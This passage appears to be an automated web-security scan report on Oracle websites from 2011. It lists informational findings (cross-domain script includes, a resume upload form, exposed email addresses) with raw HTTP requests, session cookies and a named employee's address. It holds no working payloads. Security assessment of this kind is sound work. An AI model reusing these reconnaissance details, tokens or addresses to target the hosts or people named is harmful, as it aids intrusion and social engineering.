Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=92482;ecid=135029740140,0)
Content-Length: 101567
Date: Mon, 17 Oct 2011 10:35:32 GMT
Content-Location: /servlet/page/error

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

11.11. http://solutions.oracle.com/portal/page/portal/searchresults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/searchresults

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /portal/page/portal/searchresults HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
Content-Length: 172
Cache-Control: max-age=0
Origin: http://solutions.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D

osf=&ms=xss+sqli+httpi+search+faq+contact&mo=containsany&sepg=57&fi=1&fs=57&pu=1&has=&as=2065%2C0&pao=equal&pav=Bermuda&pan=sc_membership_location&pas=0&p_action=SUBMIT&ll=

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TM;max-age=2592000+0;age=0;ecid=173684412940,1)
Content-Length: 54760
Date: Mon, 17 Oct 2011 12:03:00 GMT
Content-Location: /servlet/page/searchresults

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

11.12. http://solutions.oracle.com/solutions/bmg/consulting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /solutions/bmg/consulting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/bmg/consulting HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://solutions.oracle.com/portal/page/portal/searchresults
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Etag: "us, us"
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 17 Oct 2011 12:13:07 GMT
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=2;ecid=122145429190,0)
Content-Length: 116024
Date: Mon, 17 Oct 2011 12:13:06 GMT
Content-Location: /servlet/page/solutions/bmg/consulting

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

11.13. http://solutions.oracle.com/specializedpartners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /specializedpartners/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /specializedpartners/ HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Etag: "us, us"
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 16 Oct 2011 17:09:02 GMT
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF76739406FE58A3E040578C51E11AE1+C6405FE855A5760E772F3DFEFED889B7D6B7CD665F8BD8F797CEE2750AC703C0C2AA39586DB16688E0F8186FB8876A00F9DDB232E9A4CF16D3511E6FA4D71A4A46F633E2A917F9E06B97CFD6CE52A64C4AAD864882FA3C65; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=466851;ecid=72057711852870427,0)
Content-Length: 125995
Date: Sun, 16 Oct 2011 17:09:02 GMT
Content-Location: /servlet/page/specializedpartners/
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

12. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-upload-file.jsp

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2768
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
<td class="style1">
        RESUME FILE&nbsp;&nbsp;<input name="file1" type="file" id="file1"> </td>
...[SNIP]...

13. Email addresses disclosed  previous  next
There are 21 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


13.1. https://campus.oracle.com/campus/HR/aus_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/aus_main.html

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/aus_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:36 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 28699
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
mpanyId="1028" data-logo="https://campus.oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="Australia" data-themecolor="#959595" data-email="campusrelations_au@oracle.com">
...[SNIP]...

13.2. https://campus.oracle.com/campus/HR/cn_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/cn_main.html

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/cn_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 45746
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
a-companyId="1028" data-logo="https://campus.oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="China" data-themecolor="#959595" data-email="campusrelations_ch@oracle.com">
...[SNIP]...

13.3. https://campus.oracle.com/campus/HR/emea_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/emea_main.html

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/emea_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:31 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 38674
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:graduates-emea_ww@oracle.com?subject=Graduate%20Program%20EMEA" class="link1" style="color:#999999">
...[SNIP]...
<a href="mailto:graduates-emea_ww@oracle.com?subject=Graduate%20Program%20EMEA" target="_blank">
...[SNIP]...
<a href="mailto:graduates-emea_ww@oracle.com?subject=Graduate%20Program%20EMEA" class="link2">
...[SNIP]...

13.4. https://campus.oracle.com/campus/HR/india_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/india_main.html

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/india_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 29875
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
a-companyId="1028" data-logo="https://campus.oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="India" data-themecolor="#959595" data-email="campusrelations_in@oracle.com">
...[SNIP]...

13.5. https://campus.oracle.com/campus/HR/japan_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/japan_main.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /campus/HR/japan_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:41 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 44973
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href='mailto:campusrelations_jp@oracle.com?subject=Oracle%20Japan%20Website' class='link style6_1'>Campusrelations_jp@oracle.com</a>
...[SNIP]...
<a href='mailto:campusrelations_jp@oracle.com?subject=Oracle%20Japan%20Website' class='link style6_1'>Campusrelations_jp@oracle.com</a>
...[SNIP]...

13.6. https://campus.oracle.com/campus/HR/script/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/script/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/script/s_code.js HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/global_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:30 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 30137
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

13.7. https://campus.oracle.com/campus/HR/sg_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/sg_main.html

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/sg_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27896
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
mpanyId="1028" data-logo="https://campus.oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="Singapore" data-themecolor="#959595" data-email="campusrelations_sg@oracle.com">
...[SNIP]...

13.8. https://campus.oracle.com/campus/HR/zealand-apply.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/zealand-apply.html

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/HR/zealand-apply.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/zealand_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:30:06 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:01 GMT
Accept-Ranges: bytes
Content-Length: 3427
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:campusrelations_au@oracle.com?subject=Resume%20-%20Campus%20Website" class="style3 link">campusrelations_au@oracle.com</a>
...[SNIP]...

13.9. https://campus.oracle.com/campus/campus_feed.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/campus_feed.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/campus_feed.xml HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:28:03 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:05 GMT
Accept-Ranges: bytes
Content-Length: 11087
Connection: close
Content-Type: text/xml
X-Pad: avoid browser bug

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
   <channel>
   <title>Campus.oracle.com NEWS</title>
   <link>http://campus.oracle.com</link>
   <description>News about Oracle Campus</description>
...[SNIP]...
<managingEditor>supriya.aggarwal@oracle.com</managingEditor>
   <webMaster>supriya.aggarwal@oracle.com</webMaster>
...[SNIP]...

13.10. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
